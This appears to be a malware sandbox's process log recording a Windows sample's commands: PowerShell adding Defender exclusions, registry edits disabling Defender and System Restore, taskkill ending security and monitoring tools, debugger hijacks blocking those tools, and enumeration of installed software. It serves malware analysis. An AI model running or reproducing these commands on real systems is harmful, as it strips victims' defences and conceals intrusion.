C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\LdlkM','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\LdlkM\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1656

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
2⤵
- Kills process with taskkill
PID:1644

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1564

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
2⤵
PID:1920

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
2⤵
PID:1944

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1916

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
3⤵
- Checks for installed software on the system
PID:2000

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
3⤵
- Checks for installed software on the system
PID:656

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:2016

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1572

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:432

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:776

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
3⤵
- Checks for installed software on the system
PID:1128

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
3⤵
PID:1360

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:788

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
2⤵
- Kills process with taskkill
PID:644

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1536

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
3⤵
PID:1720

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
3⤵
PID:1260

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1808

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
3⤵
PID:1512

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
3⤵
PID:1392

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
2⤵
- Kills process with taskkill
PID:1788

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:908

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
3⤵
PID:1760

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
3⤵
PID:1592

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1956

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
3⤵
PID:1996

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
3⤵
PID:1936

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1920

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
3⤵
PID:1504

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
3⤵
PID:268

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
2⤵
- Kills process with taskkill
PID:1944

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:532

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
3⤵
PID:580

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
3⤵
PID:2012

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1508

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
3⤵
PID:888

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
3⤵
PID:540

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
2⤵
- Kills process with taskkill
PID:340

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1360

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
3⤵
PID:1128

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
3⤵
PID:1720

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1812

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
3⤵
PID:1392

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
3⤵
PID:1836

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1592

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
3⤵
PID:1984

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
3⤵
PID:2044

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1504

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
3⤵
- Checks for installed software on the system
PID:1764

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
3⤵
PID:1796

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
2⤵
- Kills process with taskkill
PID:536

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1920

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
3⤵
- Checks for installed software on the system
PID:1536

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
3⤵
PID:1668

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1112

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
3⤵
PID:1720

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
3⤵
PID:1580

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1884

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
3⤵
- Checks for installed software on the system
PID:1948

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
3⤵
PID:1936

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
2⤵
- Kills process with taskkill
PID:432

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1636

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
3⤵
PID:284

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
3⤵
PID:1904

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1664

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
3⤵
- Checks for installed software on the system
PID:1488

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
3⤵
PID:1796

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1760

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
3⤵
PID:1824

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
3⤵
PID:1532

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1696

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
3⤵
- Checks for installed software on the system
PID:340

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
3⤵
PID:1880

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1764

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
3⤵
- Checks for installed software on the system
PID:620

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
3⤵
PID:1804

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:824

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
3⤵
- Checks for installed software on the system
PID:540

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
3⤵
PID:1048

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1800

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
3⤵
- Checks for installed software on the system
PID:792

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
3⤵
PID:1584

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:468

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
3⤵
- Checks for installed software on the system
PID:292

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
3⤵
PID:1720

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1836

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
3⤵
- Checks for installed software on the system
PID:1352

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
3⤵
PID:908

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
2⤵
- Kills process with taskkill
PID:1392

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1792

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
3⤵
- Checks for installed software on the system
PID:1064

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
3⤵
PID:1996

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1920

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
3⤵
- Checks for installed software on the system
PID:1924

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
3⤵
PID:1360

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2020

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:2024

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
3⤵
PID:1796

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1488

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1588

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1512

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1496

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:776

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1656

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
2⤵
- Kills process with taskkill
PID:1696

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:340

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1544

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1712

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1048

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1096

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1788

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1368

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1940

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:2008

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:788

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:292

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1692

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:888

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:2044

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1500

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
2⤵
- Kills process with taskkill
PID:1936

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1392

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1064

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
3⤵
PID:1812

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1508

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1560

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
3⤵
PID:1956

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1644

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1532

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1376

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:452

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1908

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1108

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1244

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
3⤵
PID:1496

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:644

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1904

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1836

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:2016

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1668

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1940

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:908

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1572

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:292

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1500

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
2⤵
- Kills process with taskkill
PID:2024

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:668

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1656

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:744

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1712

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1800

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1536

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1816

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:1028

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
- Sets file execution options in registry
PID:576

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:432

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1692

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:2020

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:748

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1824

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:908

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1872

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1584

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1952

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:568

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:1260

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1600

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1916

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
3⤵
- Checks for installed software on the system
PID:792

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:1500

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
2⤵
- Kills process with taskkill
PID:1760

